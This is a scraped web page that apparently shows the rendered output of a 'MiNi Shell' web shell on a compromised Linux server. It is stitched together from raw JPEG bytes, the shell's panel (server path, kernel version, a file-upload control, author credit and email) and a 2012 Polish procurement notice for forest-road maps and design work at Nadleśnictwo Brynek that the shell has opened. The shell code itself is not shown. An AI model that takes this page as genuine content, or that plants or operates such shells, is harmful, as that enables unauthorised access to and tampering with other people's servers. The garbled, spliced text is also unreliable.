JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121018/406316-N-2012.html

<p class="kh_header"><b>Brynek: Dokumentacja dla inwestycji Modernizacji drogi leśnej wewnątrzzakładowej na odcinku ok. 24 km
zadanie nr 1 - Wykonanie map do celów projektowych
zadanie nr 2 - Wykonie dokumentacji projektowej</b><br>
<b>Numer ogłoszenia: 406316 - 2012; data zamieszczenia: 18.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Brynek , ul. Grabowa 3, 42-690 Brynek, woj. śląskie, tel. 032 2857491, faks 032 2857491.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.lasy.gov.pl/brynek</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna Skarbu Państwa nieposiadajaca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dokumentacja dla inwestycji Modernizacji drogi leśnej wewnątrzzakładowej na odcinku ok. 24 km
zadanie nr 1 - Wykonanie map do celów projektowych
zadanie nr 2 - Wykonie dokumentacji projektowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1:
Wykonanie map do celów projektowych. Mapy dla każdego wyznaczonego (na materiale graficznym będącym załącznikiem nr 3 do SIWZ) odcinka będą sporządzone oddzielnie, prace powinny się toczyć równolegle na każdym z odcinków. Do 30 dni od dnia podpisania umowy Wykonawca przekaże zamawiającemu wykaz działek ewidencyjnych, na których zlokalizowana będzie inwestycja. 
Mapy zostaną wykonane w 5 egzemplarzach + wersja elektroniczna w formacie pdf. 
Zadanie nr 2: 
	Usługa wykonania dokumentacji projektowo-kosztorysowej dla modernizacji dróg leśnych wewnątrzzakładowych w Nadleśnictwie Brynek. Opracowanie powinno być podzielone na IV odcinki, zgodnie z załączonym do SIWZ materiałem graficznym. Zamawiający dostarczy mapy do celów projektowych.
	Nadleśnictwo nie dysponuje materiałami mapowymi innymi niż mapy gospodarcze w skali 1:10 000 oraz 1: 5 000.
Uzyskanie decyzji środowiskowej, a w przypadku wymagalności opracowanie raportu oddziaływania na środowisko oraz uzyskanie decyzji lokalizacyjnej w przypadku braku planu zagospodarowania przestrzennego jest po stronie Zamawiającego. 
Przedmiot zamówienia dla każdego odcinka z osobna obejmuje:
a)	Operat wodnoprawny (bez uzyskiwania decyzji) - 3 egz + wersja elektroniczna w formacie pdf. 
b)	Projekt wykonawczy - 4 egz. + wersja elektroniczna w formacie pdf;
c)	Przedmiar robót z podziałem na branże i CPV - 2 egz. + wersja elektroniczna w formacie .pdf oraz w wersji edytowalnej;
d)	Kosztorys ofertowy - 1 egz. + wersja elektroniczna w formacie pdf;
e)	Kosztorys inwestorski - 1 egz. + wersja elektroniczna w formacie pdf oraz w wersji edytowalnej (np. .xls, .ath, .kst, itp.);
f)	Specyfikacje techniczne wykonania i odbioru robót budowlanych - 2 egz. + wersja elektroniczna w formacie pdf.
Zadanie nie obejmuje uzyskiwania decyzji administracyjnych, jednak jeśli ze względu na braki w dokumentacji uzyskanie odpowiednich decyzji i uzgodnień stanie się niemożliwe, Wykonawca na żądanie zamawiającego, w terminie przez niego wskazanym, dokona niezbędnych poprawek.
Projekt należy wykonać w oparciu o wybraną i zatwierdzoną przez Zamawiającego koncepcję..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.35.40.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie nr 1: 500 zł słownie złotych: tysiąc pięćset 00/100.
Zadanie nr 2: 1500 zł słownie złotych : tysiąc pięćset 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zadanie nr 1: zamawiający wymaga dysponowania co najmniej  1 osobą posiadającą uprawnienia zawodowe w dziedzinie geodezji i kartografii, o których mowa w art. 43 pkt. 1 lub też w art. 43 pkt. 4 ustawy Prawo geodezyjne i kartograficzne.
zadanie nr 2: zamawiający wymaga dysponowania co najmniej  1 osobą posiadającą uprawnienia budowlane odpowiedniej specjalności, aktualne zaświadczenie o wpisie do izby inżynierów budownictwa lub architektów oraz opłacone składki OC</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zadanie nr 1: 
- wykonanie przynajmniej 1 pracy dotyczącej opracowania mapy do celów projektowych o porównywalnej wielkości -co najmniej  30 ha, w tym opracowanie numeryczne
- wykonanie opracowania numerycznego w postaci plików shapefile sytuacji, uzbrojenia lub ewidencji gruntów i budynków o porównywalnej wielkości co najmniej 100 ha
zadanie nr 2: wykonanie dwóch projektów budowlanych związanych z infrastrukturą drogową o długości co najmniej 15 km</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zadanie nr 1: 
- posiadanie niezbędnego licencyjnego oprogramowania do opracowania wyników pomiarów w postaci plików shapefile - co najmniej 1 stanowisko</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument(-y) określające zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy oraz formularz ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana terminu zawartej umowy będzie możliwa w przypadku, gdy termin uzyskiwania decyzji, pozwoleń lub uzgodnień wydłuży się z przyczyn niezależnych od Wykonawcy (złożoność sprawy). (Fakt taki winien zostać potwierdzony przez właściwy organ wydający decyzję w wydłużonym terminie)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.lasy.gov.pl/brynek/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PGL LP Nadleśnictwo Brynek, ul. Grabowa 3, Brynek, 42-690 Tworóg (pokój nr 11).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2012 godzina 08:45, miejsce: PGL LP Nadleśnictwo Brynek, ul. Grabowa 3, Brynek, 42-690 Tworóg (pokój nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 15 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie map do celów projektowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie map do celów projektowych. Mapy dla każdego wyznaczonego (na materiale graficznym będącym załącznikiem nr 3 do SIWZ) odcinka będą sporządzone oddzielnie, prace powinny się toczyć równolegle na każdym z odcinków. Do 30 dni od dnia podpisania umowy Wykonawca przekaże zamawiającemu wykaz działek ewidencyjnych, na których zlokalizowana będzie inwestycja. 
Mapy zostaną wykonane w 5 egzemplarzach + wersja elektroniczna w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonie dokumentacji projektowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa wykonania dokumentacji projektowo-kosztorysowej dla modernizacji dróg leśnych wewnątrzzakładowych w Nadleśnictwie Brynek. Opracowanie powinno być podzielone na IV odcinki, zgodnie z załączonym do SIWZ materiałem graficznym. Zamawiający dostarczy mapy do celów projektowych.
	Nadleśnictwo nie dysponuje materiałami mapowymi innymi niż mapy gospodarcze w skali 1:10 000 oraz 1: 5 000.
Uzyskanie decyzji środowiskowej, a w przypadku wymagalności opracowanie raportu oddziaływania na środowisko oraz uzyskanie decyzji lokalizacyjnej w przypadku braku planu zagospodarowania przestrzennego jest po stronie Zamawiającego. 
Przedmiot zamówienia dla każdego odcinka z osobna obejmuje:
a)	Operat wodnoprawny (bez uzyskiwania decyzji) - 3 egz + wersja elektroniczna w formacie pdf. 
b)	Projekt wykonawczy - 4 egz. + wersja elektroniczna w formacie pdf;
c)	Przedmiar robót z podziałem na branże i CPV - 2 egz. + wersja elektroniczna w formacie .pdf oraz w wersji edytowalnej;
d)	Kosztorys ofertowy - 1 egz. + wersja elektroniczna w formacie pdf;
e)	Kosztorys inwestorski - 1 egz. + wersja elektroniczna w formacie pdf oraz w wersji edytowalnej (np. .xls, .ath, .kst, itp.);
f)	Specyfikacje techniczne wykonania i odbioru robót budowlanych - 2 egz. + wersja elektroniczna w formacie pdf.
Zadanie nie obejmuje uzyskiwania decyzji administracyjnych, jednak jeśli ze względu na braki w dokumentacji uzyskanie odpowiednich decyzji i uzgodnień stanie się niemożliwe, Wykonawca na żądanie zamawiającego, w terminie przez niego wskazanym, dokona niezbędnych poprawek.
Projekt należy wykonać w oparciu o wybraną i zatwierdzoną przez Zamawiającego koncepcję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com